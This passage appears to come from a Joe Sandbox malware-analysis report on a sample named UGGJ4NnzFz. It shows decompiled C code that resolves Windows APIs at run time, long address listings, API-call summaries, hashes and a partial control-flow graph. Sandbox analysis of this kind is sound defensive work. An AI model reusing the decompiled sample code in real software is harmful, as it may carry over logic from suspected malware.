				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323);
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E737515C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E737512FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E737515C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323);
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E737512FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E737512FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E737512FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E73751224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E737512FE(_t90) * 4);
					goto L165;
				}
			}



































































                                                                                                                0x73751aa0
                                                                                                                0x73751aa3
                                                                                                                0x73751aa6
                                                                                                                0x73751aa9
                                                                                                                0x73751aac
                                                                                                                0x73751aaf
                                                                                                                0x73751ab2
                                                                                                                0x73751ab4
                                                                                                                0x73751ab7
                                                                                                                0x73751aba
                                                                                                                0x73751abf
                                                                                                                0x73751ac2
                                                                                                                0x73751aca
                                                                                                                0x73751ad2
                                                                                                                0x73751ad4
                                                                                                                0x73751ad7
                                                                                                                0x73751adf
                                                                                                                0x73751adf
                                                                                                                0x73751ae4
                                                                                                                0x73751ae7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751af1
                                                                                                                0x73751af3
                                                                                                                0x73751af8
                                                                                                                0x73751afa
                                                                                                                0x73751b8b
                                                                                                                0x73751b8b
                                                                                                                0x73751b8b
                                                                                                                0x73751b8f
                                                                                                                0x73751b92
                                                                                                                0x73751b94
                                                                                                                0x73751bb6
                                                                                                                0x73751bb9
                                                                                                                0x73751bbb
                                                                                                                0x73751bc4
                                                                                                                0x73751bca
                                                                                                                0x73751bcc
                                                                                                                0x73751bd2
                                                                                                                0x73751bd2
                                                                                                                0x73751bd8
                                                                                                                0x73751bdb
                                                                                                                0x73751bdb
                                                                                                                0x73751bde
                                                                                                                0x73751bde
                                                                                                                0x73751be4
                                                                                                                0x73751be6
                                                                                                                0x73751be9
                                                                                                                0x73751bef
                                                                                                                0x73751bf2
                                                                                                                0x73751bf2
                                                                                                                0x73751bf4
                                                                                                                0x73751bfa
                                                                                                                0x73751bfd
                                                                                                                0x73751c21
                                                                                                                0x73751c24
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751c27
                                                                                                                0x73751c29
                                                                                                                0x73751c37
                                                                                                                0x73751c3a
                                                                                                                0x73751c3c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751c3e
                                                                                                                0x73751c3e
                                                                                                                0x73751c3e
                                                                                                                0x73751c44
                                                                                                                0x73751c46
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751c48
                                                                                                                0x73751c4a
                                                                                                                0x73751c4c
                                                                                                                0x73751c4e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751c4e
                                                                                                                0x73751c50
                                                                                                                0x73751c52
                                                                                                                0x73751c54
                                                                                                                0x73751c54
                                                                                                                0x73751c5a
                                                                                                                0x73751c60
                                                                                                                0x73751c62
                                                                                                                0x73751c76
                                                                                                                0x73751c76
                                                                                                                0x73751c78
                                                                                                                0x73751c64
                                                                                                                0x73751c6a
                                                                                                                0x73751c6d
                                                                                                                0x73751c6d
                                                                                                                0x00000000
                                                                                                                0x73751bff
                                                                                                                0x73751bff
                                                                                                                0x73751bff
                                                                                                                0x73751c00
                                                                                                                0x73751c08
                                                                                                                0x73751c0c
                                                                                                                0x73751c12
                                                                                                                0x73751c16
                                                                                                                0x00000000
                                                                                                                0x73751c16
                                                                                                                0x73751c02
                                                                                                                0x73751c02
                                                                                                                0x73751c03
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751c05
                                                                                                                0x73751c06
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751c06
                                                                                                                0x73751b96
                                                                                                                0x73751b97
                                                                                                                0x73751ba0
                                                                                                                0x73751ba3
                                                                                                                0x73751bb0
                                                                                                                0x73751bb0
                                                                                                                0x73751ba5
                                                                                                                0x73751ba5
                                                                                                                0x73751c7e
                                                                                                                0x73751c81
                                                                                                                0x73751c84
                                                                                                                0x73751cf6
                                                                                                                0x73751cfa
                                                                                                                0x73751adc
                                                                                                                0x00000000
                                                                                                                0x73751adc
                                                                                                                0x00000000
                                                                                                                0x73751cfa
                                                                                                                0x73751b94
                                                                                                                0x73751b00
                                                                                                                0x73751b03
                                                                                                                0x73751b66
                                                                                                                0x73751b69
                                                                                                                0x73751b7a
                                                                                                                0x73751b7a
                                                                                                                0x73751b7d
                                                                                                                0x73751c89
                                                                                                                0x73751c8c
                                                                                                                0x73751c8c
                                                                                                                0x73751c8e
                                                                                                                0x73752033
                                                                                                                0x73752045
                                                                                                                0x73752045
                                                                                                                0x73752047
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752037
                                                                                                                0x73752038
                                                                                                                0x7375203b
                                                                                                                0x7375203e
                                                                                                                0x737520ba
                                                                                                                0x737520c1
                                                                                                                0x737520c6
                                                                                                                0x737520c9
                                                                                                                0x73751cf2
                                                                                                                0x73751cf2
                                                                                                                0x73751cf2
                                                                                                                0x73751cf3
                                                                                                                0x00000000
                                                                                                                0x73751cf3
                                                                                                                0x73752040
                                                                                                                0x73752042
                                                                                                                0x73752042
                                                                                                                0x73752049
                                                                                                                0x7375204b
                                                                                                                0x737520ae
                                                                                                                0x73751ce7
                                                                                                                0x73751cea
                                                                                                                0x73751ced
                                                                                                                0x73751cf0
                                                                                                                0x73751cf0
                                                                                                                0x00000000
                                                                                                                0x73751cf0
                                                                                                                0x7375204d
                                                                                                                0x7375204f
                                                                                                                0x73752055
                                                                                                                0x73752055
                                                                                                                0x73752057
                                                                                                                0x7375205a
                                                                                                                0x7375206d
                                                                                                                0x7375206d
                                                                                                                0x73752070
                                                                                                                0x73752073
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752075
                                                                                                                0x73752078
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375207a
                                                                                                                0x73752081
                                                                                                                0x73752081
                                                                                                                0x73752087
                                                                                                                0x7375208a
                                                                                                                0x737520a6
                                                                                                                0x7375208c
                                                                                                                0x73752095
                                                                                                                0x73752098
                                                                                                                0x73752098
                                                                                                                0x00000000
                                                                                                                0x7375208a
                                                                                                                0x7375205c
                                                                                                                0x7375205f
                                                                                                                0x73752062
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752064
                                                                                                                0x00000000
                                                                                                                0x73752064
                                                                                                                0x73752051
                                                                                                                0x73752053
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752053
                                                                                                                0x73751c94
                                                                                                                0x73751c94
                                                                                                                0x73751c95
                                                                                                                0x73751dde
                                                                                                                0x73751dde
                                                                                                                0x73751de5
                                                                                                                0x73751de8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751df5
                                                                                                                0x00000000
                                                                                                                0x73751fdb
                                                                                                                0x73751fde
                                                                                                                0x73751fe1
                                                                                                                0x73751fe1
                                                                                                                0x73751fe2
                                                                                                                0x73751fe5
                                                                                                                0x73751fe7
                                                                                                                0x73751fe9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751feb
                                                                                                                0x73751feb
                                                                                                                0x73751fee
                                                                                                                0x73752000
                                                                                                                0x73752003
                                                                                                                0x73752006
                                                                                                                0x7375200c
                                                                                                                0x00000000
                                                                                                                0x7375200c
                                                                                                                0x73751ff0
                                                                                                                0x73751ff0
                                                                                                                0x73751ff2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751ff4
                                                                                                                0x73751ff6
                                                                                                                0x73751ff8
                                                                                                                0x73751ff8
                                                                                                                0x73751ff8
                                                                                                                0x73751ff9
                                                                                                                0x73751ffb
                                                                                                                0x73751ffd
                                                                                                                0x73751fe1
                                                                                                                0x73751fe2
                                                                                                                0x73751fe5
                                                                                                                0x73751fe7
                                                                                                                0x73751fe9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751fe9
                                                                                                                0x00000000
                                                                                                                0x73751e3c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751e48
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751e2f
                                                                                                                0x73751e33
                                                                                                                0x73751e37
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751fad
                                                                                                                0x73751fb1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751fb7
                                                                                                                0x73751fbf
                                                                                                                0x73751fc6
                                                                                                                0x73751fce
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f15
                                                                                                                0x73751f15
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751e51
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375202b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f1d
                                                                                                                0x73751f1f
                                                                                                                0x73751f1f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375201b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375201f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752027
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f64
                                                                                                                0x73751f66
                                                                                                                0x73751f66
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f2f
                                                                                                                0x73751f31
                                                                                                                0x73751f31
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f41
                                                                                                                0x73751f43
                                                                                                                0x73751f43
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f72
                                                                                                                0x73751f74
                                                                                                                0x73751f74
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f4c
                                                                                                                0x73751f4e
                                                                                                                0x73751f4e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f53
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752023
                                                                                                                0x7375202d
                                                                                                                0x7375202d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f7d
                                                                                                                0x73751f81
                                                                                                                0x73751f86
                                                                                                                0x73751f89
                                                                                                                0x73751f8a
                                                                                                                0x73751f8d
                                                                                                                0x73751f93
                                                                                                                0x73751f93
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752013
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f57
                                                                                                                0x73751f57
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751e58
                                                                                                                0x73751e58
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f6b
                                                                                                                0x73751f6d
                                                                                                                0x73751f6d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751dfc
                                                                                                                0x73751e02
                                                                                                                0x73751e05
                                                                                                                0x73751e07
                                                                                                                0x73751e07
                                                                                                                0x73751e0a
                                                                                                                0x73751e0e
                                                                                                                0x73751e1b
                                                                                                                0x73751e1d
                                                                                                                0x73751e23
                                                                                                                0x73751e23
                                                                                                                0x73751e23
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f20
                                                                                                                0x73751f20
                                                                                                                0x73751f22
                                                                                                                0x73751f29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f67
                                                                                                                0x73751f67
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f32
                                                                                                                0x73751f32
                                                                                                                0x73751f34
                                                                                                                0x73751f3b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f44
                                                                                                                0x73751f44
                                                                                                                0x73751f46
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f75
                                                                                                                0x73751f75
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f4f
                                                                                                                0x73751f4f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f9b
                                                                                                                0x73751f9f
                                                                                                                0x73751fa4
                                                                                                                0x73751fa7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f59
                                                                                                                0x73751f59
                                                                                                                0x73751f5c
                                                                                                                0x73751f5e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751f6e
                                                                                                                0x73751f6e
                                                                                                                0x73751f77
                                                                                                                0x73751f77
                                                                                                                0x73751e5a
                                                                                                                0x73751e5a
                                                                                                                0x73751e5d
                                                                                                                0x73751e64
                                                                                                                0x73751e66
                                                                                                                0x73751e68
                                                                                                                0x73751e6f
                                                                                                                0x73751e72
                                                                                                                0x73751e77
                                                                                                                0x73751e79
                                                                                                                0x73751e7b
                                                                                                                0x73751e7f
                                                                                                                0x73751e85
                                                                                                                0x73751e8b
                                                                                                                0x73751e8b
                                                                                                                0x73751e8d
                                                                                                                0x73751e8d
                                                                                                                0x73751e8e
                                                                                                                0x73751e8e
                                                                                                                0x73751e92
                                                                                                                0x73751e98
                                                                                                                0x73751e9a
                                                                                                                0x73751e9e
                                                                                                                0x73751ea3
                                                                                                                0x73751ea3
                                                                                                                0x73751ea5
                                                                                                                0x73751ea5
                                                                                                                0x73751ea8
                                                                                                                0x73751eab
                                                                                                                0x73751eb4
                                                                                                                0x73751eb7
                                                                                                                0x73751eba
                                                                                                                0x73751eba
                                                                                                                0x73751ebc
                                                                                                                0x73751ebf
                                                                                                                0x73751ec5
                                                                                                                0x73751ecb
                                                                                                                0x73751ecb
                                                                                                                0x73751ecd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751ed3
                                                                                                                0x73751ed3
                                                                                                                0x73751ed7
                                                                                                                0x73751ede
                                                                                                                0x73751f02
                                                                                                                0x73751f02
                                                                                                                0x73751f06
                                                                                                                0x73751f08
                                                                                                                0x73751f0b
                                                                                                                0x73751f0b
                                                                                                                0x73751f0e
                                                                                                                0x73751f0e
                                                                                                                0x00000000
                                                                                                                0x73751f06
                                                                                                                0x73751ee3
                                                                                                                0x73751ee6
                                                                                                                0x73751ee6
                                                                                                                0x73751eed
                                                                                                                0x73751eef
                                                                                                                0x73751ef2
                                                                                                                0x73751ef9
                                                                                                                0x73751efa
                                                                                                                0x73751f00
                                                                                                                0x73751f00
                                                                                                                0x00000000
                                                                                                                0x73751f00
                                                                                                                0x73751ef4
                                                                                                                0x73751ef7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751ef7
                                                                                                                0x73751e87
                                                                                                                0x73751e89
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751df5
                                                                                                                0x73751c9b
                                                                                                                0x73751c9b
                                                                                                                0x73751c9c
                                                                                                                0x73751ddb
                                                                                                                0x00000000
                                                                                                                0x73751ddb
                                                                                                                0x73751ca2
                                                                                                                0x73751ca3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751ca9
                                                                                                                0x73751cac
                                                                                                                0x73751da0
                                                                                                                0x73751da0
                                                                                                                0x73751da3
                                                                                                                0x73751db8
                                                                                                                0x73751dba
                                                                                                                0x73751dba
                                                                                                                0x73751dbb
                                                                                                                0x73751dbe
                                                                                                                0x73751dc1
                                                                                                                0x73751dcd
                                                                                                                0x73751dcd
                                                                                                                0x73751dcd
                                                                                                                0x73751dc3
                                                                                                                0x73751dc3
                                                                                                                0x73751dc3
                                                                                                                0x73751dd3
                                                                                                                0x00000000
                                                                                                                0x73751dd3
                                                                                                                0x73751da5
                                                                                                                0x73751da5
                                                                                                                0x73751da6
                                                                                                                0x73751db4
                                                                                                                0x00000000
                                                                                                                0x73751db4
                                                                                                                0x73751da9
                                                                                                                0x73751daa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751db0
                                                                                                                0x00000000
                                                                                                                0x73751db0
                                                                                                                0x73751cb2
                                                                                                                0x73751d9c
                                                                                                                0x00000000
                                                                                                                0x73751d9c
                                                                                                                0x73751cb8
                                                                                                                0x73751cb8
                                                                                                                0x73751cbb
                                                                                                                0x73751ce4
                                                                                                                0x00000000
                                                                                                                0x73751ce4
                                                                                                                0x73751cbd
                                                                                                                0x73751cbd
                                                                                                                0x73751cc0
                                                                                                                0x73751cda
                                                                                                                0x00000000
                                                                                                                0x73751cda
                                                                                                                0x73751cc2
                                                                                                                0x73751cc2
                                                                                                                0x73751cc5
                                                                                                                0x73751cd4
                                                                                                                0x00000000
                                                                                                                0x73751cd4
                                                                                                                0x73751cc8
                                                                                                                0x73751cc9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751ccb
                                                                                                                0x00000000
                                                                                                                0x73751b83
                                                                                                                0x73751b83
                                                                                                                0x73751b86
                                                                                                                0x00000000
                                                                                                                0x73751b86
                                                                                                                0x73751b7d
                                                                                                                0x73751b6b
                                                                                                                0x73751b6f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751b71
                                                                                                                0x73751b74
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751b74
                                                                                                                0x73751b05
                                                                                                                0x73751b08
                                                                                                                0x73751b3e
                                                                                                                0x73751b41
                                                                                                                0x00000000
                                                                                                                0x73751b47
                                                                                                                0x73751b49
                                                                                                                0x73751b4d
                                                                                                                0x73751b54
                                                                                                                0x73751b5b
                                                                                                                0x73751b5e
                                                                                                                0x73751b61
                                                                                                                0x00000000
                                                                                                                0x73751b61
                                                                                                                0x73751b41
                                                                                                                0x73751b0a
                                                                                                                0x73751b0b
                                                                                                                0x73751b26
                                                                                                                0x73751b29
                                                                                                                0x00000000
                                                                                                                0x73751b2f
                                                                                                                0x73751b2f
                                                                                                                0x73751b36
                                                                                                                0x73751b39
                                                                                                                0x00000000
                                                                                                                0x73751b39
                                                                                                                0x73751b29
                                                                                                                0x73751b10
                                                                                                                0x00000000
                                                                                                                0x73751b16
                                                                                                                0x73751b16
                                                                                                                0x73751b1d
                                                                                                                0x00000000
                                                                                                                0x73751b1d
                                                                                                                0x73751b10
                                                                                                                0x73751d09
                                                                                                                0x73751d0e
                                                                                                                0x73751d13
                                                                                                                0x73751d17
                                                                                                                0x737521c6
                                                                                                                0x737521cc
                                                                                                                0x73751d29
                                                                                                                0x73751d2b
                                                                                                                0x73751d2c
                                                                                                                0x737520f1
                                                                                                                0x737520f1
                                                                                                                0x737520f4
                                                                                                                0x737520f7
                                                                                                                0x73752114
                                                                                                                0x7375211a
                                                                                                                0x7375211c
                                                                                                                0x73752122
                                                                                                                0x73752139
                                                                                                                0x73752139
                                                                                                                0x73752139
                                                                                                                0x73752146
                                                                                                                0x7375214c
                                                                                                                0x7375214f
                                                                                                                0x73752155
                                                                                                                0x73752157
                                                                                                                0x7375215a
                                                                                                                0x7375215c
                                                                                                                0x73752163
                                                                                                                0x73752168
                                                                                                                0x7375216b
                                                                                                                0x7375216d
                                                                                                                0x73752172
                                                                                                                0x73752184
                                                                                                                0x73752184
                                                                                                                0x73752172
                                                                                                                0x7375216b
                                                                                                                0x7375215a
                                                                                                                0x7375218a
                                                                                                                0x7375218d
                                                                                                                0x73752197
                                                                                                                0x7375219f
                                                                                                                0x737521ab
                                                                                                                0x737521b1
                                                                                                                0x737521b4
                                                                                                                0x737520e6
                                                                                                                0x737520e6
                                                                                                                0x00000000
                                                                                                                0x737520e6
                                                                                                                0x737521ba
                                                                                                                0x737521c0
                                                                                                                0x737521c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x737521c2
                                                                                                                0x737521c2
                                                                                                                0x737521c2
                                                                                                                0x737521c2
                                                                                                                0x00000000
                                                                                                                0x7375218f
                                                                                                                0x7375218f
                                                                                                                0x73752195
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752195
                                                                                                                0x7375218d
                                                                                                                0x73752125
                                                                                                                0x7375212b
                                                                                                                0x7375212d
                                                                                                                0x73752133
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752133
                                                                                                                0x737520f9
                                                                                                                0x73752100
                                                                                                                0x73752106
                                                                                                                0x7375210c
                                                                                                                0x00000000
                                                                                                                0x7375210c
                                                                                                                0x73751d32
                                                                                                                0x73751d33
                                                                                                                0x737520d0
                                                                                                                0x737520d0
                                                                                                                0x737520d6
                                                                                                                0x737520d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x737520e0
                                                                                                                0x737520e5
                                                                                                                0x00000000
                                                                                                                0x737520e5
                                                                                                                0x73751d3a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751d40
                                                                                                                0x73751d40
                                                                                                                0x73751d49
                                                                                                                0x73751d4e
                                                                                                                0x73751d54
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751d5a
                                                                                                                0x73751d67
                                                                                                                0x73751d6d
                                                                                                                0x73751d77
                                                                                                                0x73751d7d
                                                                                                                0x73751d85
                                                                                                                0x73751d95
                                                                                                                0x00000000
                                                                                                                0x73751d95

                                                                                                                APIs
                                                                                                                  • Part of subcall function 73751215: GlobalAlloc.KERNELBASE(00000040,73751233,?,737512CF,-7375404B,737511AB,-000000A0), ref: 7375121D
                                                                                                                • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73751BC4
                                                                                                                • lstrcpyA.KERNEL32(00000008,?), ref: 73751C0C
                                                                                                                • lstrcpyA.KERNEL32(00000408,?), ref: 73751C16
                                                                                                                • GlobalFree.KERNEL32 ref: 73751C29
                                                                                                                • GlobalFree.KERNEL32 ref: 73751D09
                                                                                                                • GlobalFree.KERNEL32 ref: 73751D0E
                                                                                                                • GlobalFree.KERNEL32 ref: 73751D13
                                                                                                                • GlobalFree.KERNEL32 ref: 73751EFA
                                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 73752098
                                                                                                                • GetModuleHandleA.KERNEL32(00000008), ref: 73752114
                                                                                                                • LoadLibraryA.KERNEL32(00000008), ref: 73752125
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 7375217E
                                                                                                                • lstrlenA.KERNEL32(00000408), ref: 73752198
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.221701988.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.221693886.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221717346.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221724453.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73750000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 245916457-0
                                                                                                                • Opcode ID: e0d76e689e65cabe3173989157f76c58257c6e140f5f6000122f567a6fd663f0
                                                                                                                • Instruction ID: e5999fd4d76c35b1a52ad13550df9831a03d174da8103b42d9f6d7b084567649
                                                                                                                • Opcode Fuzzy Hash: e0d76e689e65cabe3173989157f76c58257c6e140f5f6000122f567a6fd663f0
                                                                                                                • Instruction Fuzzy Hash: 9E229B7290420ADFDF1ACFA4C9847AEBBF5BB05306F14852EE196E3280DB755981DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 793 406131-406136 794 4061a7-4061c5 793->794 795 406138-406167 793->795 796 40679d-4067b2 794->796 797 406169-40616c 795->797 798 40616e-406172 795->798 801 4067b4-4067ca 796->801 802 4067cc-4067e2 796->802 803 40617e-406181 797->803 799 406174-406178 798->799 800 40617a 798->800 799->803 800->803 804 4067e5-4067ec 801->804 802->804 805 406183-40618c 803->805 806 40619f-4061a2 803->806 809 406813-40681f 804->809 810 4067ee-4067f2 804->810 807 406191-40619d 805->807 808 40618e 805->808 811 406374-406392 806->811 814 406207-406235 807->814 808->807 820 405fb5-405fbe 809->820 815 4069a1-4069ab 810->815 816 4067f8-406810 810->816 812 406394-4063a8 811->812 813 4063aa-4063bc 811->813 818 4063bf-4063c9 812->818 813->818 821 406251-40626b 814->821 822 406237-40624f 814->822 819 4069b7-4069ca 815->819 816->809 825 4063cb 818->825 826 40636c-406372 818->826 827 4069cf-4069d3 819->827 823 405fc4 820->823 824 4069cc 820->824 828 40626e-406278 821->828 822->828 831 406070-406074 823->831 832 4060e0-4060e4 823->832 833 405fcb-405fcf 823->833 834 40610b-40612c 823->834 824->827 835 406347-40634b 825->835 836 4064dc-4064e9 825->836 826->811 837 406310-40631a 826->837 829 40627e 828->829 830 4061ef-4061f5 828->830 854 4061d4-4061ec 829->854 855 40693b-406945 829->855 842 4062a8-4062ae 830->842 843 4061fb-406201 830->843 848 406920-40692a 831->848 849 40607a-406093 831->849 840 4060ea-4060fe 832->840 841 40692f-406939 832->841 833->819 839 405fd5-405fe2 833->839 834->796 846 406351-406369 835->846 847 406953-40695d 835->847 836->820 844 406320-406342 837->844 845 40695f-406969 837->845 839->824 852 405fe8-40602e 839->852 853 406101-406109 840->853 841->819 850 4062b0-4062ce 842->850 851 40630c 842->851 843->814 843->851 844->836 845->819 846->826 847->819 848->819 856 406096-40609a 849->856 858 4062d0-4062e4 850->858 859 4062e6-4062f8 850->859 851->837 860 406030-406034 852->860 861 406056-406058 852->861 853->832 853->834 854->830 855->819 856->831 857 40609c-4060a2 856->857 862 4060a4-4060ab 857->862 863 4060cc-4060de 857->863 864 4062fb-406305 858->864 859->864 865 406036-406039 GlobalFree 860->865 866 40603f-40604d GlobalAlloc 860->866 867 406066-40606e 861->867 868 40605a-406064 861->868 869 4060b6-4060c6 GlobalAlloc 862->869 870 4060ad-4060b0 GlobalFree 862->870 863->853 864->842 871 406307 864->871 865->866 866->824 872 406053 866->872 867->856 868->867 868->868 869->824 869->863 870->869 874 406947-406951 871->874 875 40628d-4062a5 871->875 872->861 874->819 875->842
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E00406131() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
